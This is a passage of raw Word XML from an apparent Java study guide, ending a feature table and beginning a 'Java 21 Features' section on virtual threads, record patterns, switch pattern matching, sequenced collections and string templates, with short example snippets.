      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="1C591504" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02FA54DD"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Text Blocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589662CC"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Multiline string literals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="1135268A" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2087E9F6"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Enhanced NPE Messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19273BFD"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Better error diagnostics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="7686284C" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F143681"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Foreign Function &amp; Memory API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="057BB973"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Safe native interop (Incubator)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="12CAA3D2" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C4DC4E"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New Random Generators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02445702" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Flexible PRNG implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FBEEDDC" w14:textId="77581DFF" w:rsidR="00E90957" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="42209746">
          <v:rect id="_x0000_i1797" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00E90957" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEAA5C7" w14:textId="0757A5F7" w:rsidR="00032852" w:rsidRPr="00CE4B95" w:rsidRDefault="00032852" w:rsidP="00032852">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="_Toc196307733"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java 21 Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w14:paraId="4E354C6B" w14:textId="77777777" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461079A1" w14:textId="3EBF8210" w:rsidR="00301558" w:rsidRPr="00CE4B95" w:rsidRDefault="00301558">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="254" w:name="_Toc196307734"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java 21 features?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="254"/>
    </w:p>
    <w:p w14:paraId="4EE6D91A" w14:textId="14C05E07" w:rsidR="004C7B2C" w:rsidRPr="00857FCF" w:rsidRDefault="004C7B2C" w:rsidP="008874B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857FCF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00857FCF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00857FCF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Java 21 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09238D18" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Java 21, released in September 2023, is a Long-Term Support (LTS) version. It includes powerful new features, especially around pattern matching, virtual threads, and improvements in performance, syntax, and foreign APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E8929C" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6E39B3E7">
          <v:rect id="_x0000_i1798" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D29AF" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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1. Virtual Threads (JEP 444 - Final)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37451590" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Lightweight threads that help with high-throughput concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728FD1DE" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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110791"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Threa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artVirtualThrea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2731E39" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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11079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Non-blocking, lightweight task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655B2BD3" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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11079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ello from a virtual thread"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39D9A1" w14:textId="2D47BA1C" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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110791"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7654B5EC" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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Great for scalable applications like servers and reactive systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD42442" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="36B7A5CC">
          <v:rect id="_x0000_i1799" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FC5D4" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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2. Record Patterns (JEP 440 - Final)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5254A" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Deconstruct records more concisely in pattern matching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734EBB0" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">record </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Poin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442B4F3" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24AB6A" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Objec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FD0D2E1" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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obj </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>instanceo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oin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936E59E" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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X: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x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Y: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y</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13BD30" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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2FF8A8D" w14:textId="596AEB3D" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4BB9AA" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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Improves destructuring of objects in conditionals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E7A11" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="3E6046C5">
          <v:rect id="_x0000_i1800" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D9759" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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3. Pattern Matching for switch (JEP 441 - Final)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E3FB84" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Enhances switch expressions with type patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F30A06" w14:textId="77777777" w:rsidR="003D7FD4" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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forma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Objec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4D44061" w14:textId="77777777" w:rsidR="003D7FD4" w:rsidRPr="00CE4B95"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witch</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DB6858E" w14:textId="77777777" w:rsidR="003D7FD4" w:rsidRPr="00CE4B95"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as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in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p>
    <w:p w14:paraId="3E2E7AE4" w14:textId="77777777" w:rsidR="003D7FD4" w:rsidRPr="00CE4B95"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as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String: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UpperCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D62A9" w14:textId="77777777" w:rsidR="003D7FD4" w:rsidRPr="00CE4B95"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defaul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Unknown"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E9B1A" w14:textId="77777777" w:rsidR="003D7FD4" w:rsidRPr="00CE4B95"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D68A562" w14:textId="4CDF5FA1" w:rsidR="003D7FD4" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C00B957" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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Improves readability and reduces boilerplate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D3252E" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="0E87CE3C">
          <v:rect id="_x0000_i1801" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946491B" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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4. Sequenced Collections (JEP 431)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F39CB" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>New interface that adds consistent ordering to Collections (first(), last(), etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3143EA87" w14:textId="2F44BFCB" w:rsidR="003D7FD4" w:rsidRPr="00CE4B95"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1866731"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SequencedCollection</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name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quencedSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4EA5A4" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">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Adds order-sensitive operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3531B0" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="0AFF7F09">
          <v:rect id="_x0000_i1802" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFEDC1" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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5. String Templates (JEP 430 - Preview)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A10BD2A" w14:textId="77777777" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C7B2C" w:rsidP="004C7B2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Simplifies string construction with embedded expressions.</w:t>
      </w:r>
    </w:p>
